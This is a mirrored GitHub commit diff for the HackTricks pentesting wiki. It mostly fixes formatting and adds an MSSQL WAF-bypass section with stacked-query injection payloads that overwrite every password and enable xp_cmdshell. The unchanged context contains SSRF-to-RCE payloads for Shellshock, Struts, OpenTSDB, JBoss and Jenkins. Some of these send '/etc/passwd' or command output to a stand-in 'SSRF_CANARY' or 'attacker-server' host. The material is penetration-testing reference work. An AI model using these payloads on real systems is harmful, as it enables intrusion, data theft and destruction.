mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-4008: change request with no subject merged in GitBook
This commit is contained in:
parent
77f039bd0f
commit
f11b4d1856
11 changed files with 102 additions and 70 deletions
BIN
.gitbook/assets/image (12) (3).png
Normal file
BIN
.gitbook/assets/image (12) (3).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 28 KiB |
Binary file not shown.
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 9.2 KiB |
|
@ -322,7 +322,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
|
|||
|
||||
**Detected by defender**
|
||||
|
||||
***
|
||||
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -211,7 +211,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
|
|||
|
||||
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (12) (3).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -7,8 +7,8 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -18,10 +18,9 @@
|
|||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
|
||||
\
|
||||
\\
|
||||
|
||||
|
||||
****
|
||||
|
||||
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
|
||||
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
|
||||
|
@ -131,8 +130,6 @@ Java.perform(function () {
|
|||
});
|
||||
```
|
||||
|
||||
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FwdlXOpyZOVGNzyhOiiFK%2Fimage%20(1).png?alt=media&token=13f4d279-7d3f-47ce-a68e-35f9a906973f" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
|
@ -146,7 +143,7 @@ Java.perform(function () {
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -247,6 +247,7 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
|
|||
* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
|
||||
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
||||
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
||||
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
||||
|
||||
### Brute Force directories and files
|
||||
|
||||
|
|
|
@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
|
|||
</html>
|
||||
```
|
||||
|
||||
***
|
||||
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -90,7 +90,7 @@ Other useful extensions:
|
|||
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
||||
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
||||
|
||||
***
|
||||
|
||||
|
||||
### Other Tricks to check
|
||||
|
||||
|
|
|
@ -7,8 +7,8 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -16,7 +16,7 @@
|
|||
|
||||
It may be possible to **enumerate domain users via SQL injection inside a MSSQL** server using the following MSSQL functions:
|
||||
|
||||
* **`SELECT DEFAULT_DOMAIN()`**: Get current domain name. 
|
||||
* **`SELECT DEFAULT_DOMAIN()`**: Get current domain name.
|
||||
* **`master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))`**: If you know the name of the domain (_DOMAIN_ in this example) this function will return the **SID of the user Administrator** in hex format. This will look like `0x01050000000[...]0000f401`, note how the **last 4 bytes** are the number **500** in **big endian** format, which is the **common ID of the user administrator**.\
|
||||
This function will allow you to **know the ID of the domain** (all the bytes except of the last 4).
|
||||
* **`SUSER_SNAME(0x01050000000[...]0000e803)`** : This function will return the **username of the ID indicated** (if any), in this case **0000e803** in big endian == **1000** (usually this is the ID of the first regular user ID created). Then you can imagine that you can brute-force user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:
|
||||
|
@ -119,11 +119,11 @@ SELECT @user = (SELECT user);
|
|||
EXEC ('master..xp_dirtree "\\'+@user+'.attacker-server\aa"');
|
||||
```
|
||||
|
||||
Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network request to **only TCP port 445**. You cannot control the port number, but can read information from network shares. 
|
||||
Much like MySQL’s `LOAD_FILE`, you can use `xp_dirtree` to make a network request to **only TCP port 445**. You cannot control the port number, but can read information from network shares.
|
||||
|
||||
**PS:** This does not work on `Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)` running on a `Windows Server 2016 Datacenter` in the default config.
|
||||
|
||||
There are **other** stored procedures **** [**like `master..xp_fileexist`**](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) or **`xp_subdirs`** that can be used for similar results.
|
||||
There are **other** stored procedures \*\*\*\* [**like `master..xp_fileexist`**](https://social.technet.microsoft.com/wiki/contents/articles/40107.xp-fileexist-and-its-alternate.aspx) or **`xp_subdirs`** that can be used for similar results.
|
||||
|
||||
### `xp_cmdshell` <a href="#master-xp-cmdshell" id="master-xp-cmdshell"></a>
|
||||
|
||||
|
@ -232,16 +232,62 @@ A period instead of a whitespace between FROM and a column name:
|
|||
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
|
||||
```
|
||||
|
||||
\N seperator between SELECT and a throwaway column:
|
||||
\N separator between SELECT and a throwaway column:
|
||||
|
||||
```
|
||||
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
|
||||
```
|
||||
|
||||
### WAF Bypass with unorthodox stacked queries
|
||||
|
||||
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
So for example, multiple quesries such as:
|
||||
|
||||
```sql
|
||||
use [tempdb]
|
||||
create table [test] ([id] int)
|
||||
insert [test] values(1)
|
||||
select [id] from [test]
|
||||
drop table[test]
|
||||
```
|
||||
|
||||
Can be reduced to:
|
||||
|
||||
```sql
|
||||
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
|
||||
```
|
||||
|
||||
Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:
|
||||
|
||||
```
|
||||
# Adding a useless exec() at the end and making the WAF think this isn't a valid querie
|
||||
admina'union select 1,'admin','testtest123'exec('select 1')--
|
||||
## This will be:
|
||||
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
|
||||
exec('select 1')--'
|
||||
|
||||
# Using weirdly built queries
|
||||
admin'exec('update[users]set[password]=''a''')--
|
||||
## This will be:
|
||||
SELECT id, username, password FROM users WHERE username = 'admin'
|
||||
exec('update[users]set[password]=''a''')--'
|
||||
|
||||
# Or enabling xp_cmdshell
|
||||
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
|
||||
## This will be
|
||||
select * from users where username = ' admin'
|
||||
exec('sp_configure''show advanced option'',''1''reconfigure')
|
||||
exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
|
||||
* [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)
|
||||
* [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -250,7 +296,7 @@ https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
@ -17,7 +17,7 @@
|
|||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
***
|
||||
|
||||
|
||||
**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
|
||||
|
||||
|
@ -117,7 +117,7 @@ SELECT $TAG$hacktricks$TAG$;
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,25 +1,20 @@
|
|||
|
||||
# SSRF Vulnerable Platforms
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
|
||||
|
||||
# Elasticsearch
|
||||
## Elasticsearch
|
||||
|
||||
**Commonly bound port: 9200**
|
||||
|
||||
|
@ -44,7 +39,7 @@ Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and u
|
|||
/_cluster/nodes/_all/_shutdown
|
||||
```
|
||||
|
||||
# Weblogic
|
||||
## Weblogic
|
||||
|
||||
**Commonly bound ports: 80, 443 (SSL), 7001, 8888**
|
||||
|
||||
|
@ -134,13 +129,13 @@ Content-Length: 117
|
|||
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
|
||||
```
|
||||
|
||||
# Hashicorp Consul
|
||||
## Hashicorp Consul
|
||||
|
||||
**Commonly bound ports: 8500, 8501 (SSL)**
|
||||
|
||||
Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
|
||||
|
||||
# Shellshock
|
||||
## Shellshock
|
||||
|
||||
**Commonly bound ports: 80, 443 (SSL), 8080**
|
||||
|
||||
|
@ -156,7 +151,7 @@ Short list of CGI paths to test:
|
|||
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
|
||||
```
|
||||
|
||||
# Apache Druid
|
||||
## Apache Druid
|
||||
|
||||
**Commonly bound ports: 80, 8080, 8888, 8082**
|
||||
|
||||
|
@ -185,7 +180,7 @@ Shutdown supervisors on Apache Druid Overlords:
|
|||
/druid/indexer/v1/supervisor/{supervisorId}/shutdown
|
||||
```
|
||||
|
||||
# Apache Solr
|
||||
## Apache Solr
|
||||
|
||||
**Commonly bound port: 8983**
|
||||
|
||||
|
@ -217,7 +212,7 @@ Taken from [here](https://github.com/veracode-research/solr-injection).
|
|||
|
||||
[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
|
||||
|
||||
# PeopleSoft
|
||||
## PeopleSoft
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -272,7 +267,7 @@ Content-Type: application/xml
|
|||
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
|
||||
```
|
||||
|
||||
# Apache Struts
|
||||
## Apache Struts
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -286,7 +281,7 @@ Append this to the end of every internal endpoint/URL you know of:
|
|||
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
|
||||
```
|
||||
|
||||
# JBoss
|
||||
## JBoss
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -298,7 +293,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
|
||||
```
|
||||
|
||||
# Confluence
|
||||
## Confluence
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -316,7 +311,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
|
||||
```
|
||||
|
||||
# Jira
|
||||
## Jira
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -336,7 +331,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
|
||||
```
|
||||
|
||||
# Other Atlassian Products
|
||||
## Other Atlassian Products
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
|
||||
|
||||
|
@ -354,7 +349,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
|
||||
```
|
||||
|
||||
# OpenTSDB
|
||||
## OpenTSDB
|
||||
|
||||
**Commonly bound port: 4242**
|
||||
|
||||
|
@ -374,7 +369,7 @@ Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
|
|||
/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
|
||||
```
|
||||
|
||||
# Jenkins
|
||||
## Jenkins
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080,8888**
|
||||
|
||||
|
@ -402,7 +397,7 @@ pay = 'public class x {public x(){"%s".execute()}}' % cmd
|
|||
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
|
||||
```
|
||||
|
||||
# Hystrix Dashboard
|
||||
## Hystrix Dashboard
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL),8080**
|
||||
|
||||
|
@ -414,7 +409,7 @@ Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1
|
|||
/proxy.stream?origin=http://SSRF_CANARY/
|
||||
```
|
||||
|
||||
# W3 Total Cache
|
||||
## W3 Total Cache
|
||||
|
||||
**Commonly bound ports: 80,443 (SSL)**
|
||||
|
||||
|
@ -454,7 +449,7 @@ echo($req);
|
|||
?>
|
||||
```
|
||||
|
||||
# Docker
|
||||
## Docker
|
||||
|
||||
**Commonly bound ports: 2375, 2376 (SSL)**
|
||||
|
||||
|
@ -479,7 +474,7 @@ Content-Type: application/json
|
|||
|
||||
Replace alpine with an arbitrary image you would like the docker container to run.
|
||||
|
||||
# Gitlab Prometheus Redis Exporter
|
||||
## Gitlab Prometheus Redis Exporter
|
||||
|
||||
**Commonly bound ports: 9121**
|
||||
|
||||
|
@ -493,11 +488,11 @@ The following endpoint will allow an attacker to dump all the keys in the redis
|
|||
http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
|
||||
```
|
||||
|
||||
***
|
||||
|
||||
|
||||
**Possible via Gopher**
|
||||
|
||||
# Redis
|
||||
## Redis
|
||||
|
||||
**Commonly bound port: 6379**
|
||||
|
||||
|
@ -609,7 +604,7 @@ While this required authenticated access to GitLab to exploit, I am including th
|
|||
